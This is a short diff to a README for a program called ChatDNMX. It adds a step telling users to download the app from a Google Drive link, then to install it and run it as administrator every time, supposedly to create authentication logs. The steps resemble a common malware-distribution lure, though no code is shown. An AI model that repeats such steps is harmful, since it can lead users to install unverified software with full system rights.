CodClever/ChatDNMX/README.md

 ** INSTRUCTIONS ** :-
 1.)
+Download the app from this link: https://drive.google.com/file/d/1Lviz2Lw_DcxeNqyTgicG29mqXcSUvYr4/view?usp=sharing 2.)
 Install the setup.
-2.)
+3.)
 Go through the setup very carefully.
-3.)
+4.)
 Locate ChatDNMX.
-4.)
+5.)
 Run it as an administrator(Do this every time, this is run as an administrator to create logs for authentication).
-5.)
+6.)
 Enjoy using ChatDNMX